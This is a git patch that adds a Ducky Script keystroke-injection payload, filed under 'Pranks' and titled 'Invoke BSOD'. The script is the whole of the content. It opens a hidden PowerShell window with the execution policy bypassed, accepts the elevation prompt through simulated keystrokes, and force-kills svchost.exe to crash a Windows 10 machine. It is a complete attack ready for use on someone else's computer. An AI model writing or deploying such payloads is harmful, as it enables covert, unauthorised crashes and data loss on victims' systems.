From 91b560bd5702f3e95a7b4a9e472524efeab0c077 Mon Sep 17 00:00:00 2001 From: beigeworm <93350544+beigeworm@users.noreply.github.com> Date: Mon, 8 May 2023 23:11:43 +0000 Subject: [PATCH] Add files via upload --- Pranks/BSOD.txt | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 Pranks/BSOD.txt diff --git a/Pranks/BSOD.txt b/Pranks/BSOD.txt new file mode 100644 index 0000000..7bdd6ef --- /dev/null +++ b/Pranks/BSOD.txt @@ -0,0 +1,24 @@ +REM Title: Invoke BSOD +REM Author: @beigeworm +REM Description: This will open powershell and invoke a blue screen. +REM Target: Windows 10 + +REM ============================================================================= + +REM ***This is a dangerous script - Be Careful!!!*** + +REM some setup for dukie script. +LOCALE US +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window) +GUI r +DELAY 750 +STRING powershell -NoP -NonI -W Hidden -Exec Bypass +CONTROL SHIFT ENTER +DELAY 1500 +ALT y +DELAY 5000 + +STRING taskkill /f /im svchost.exe +ENTER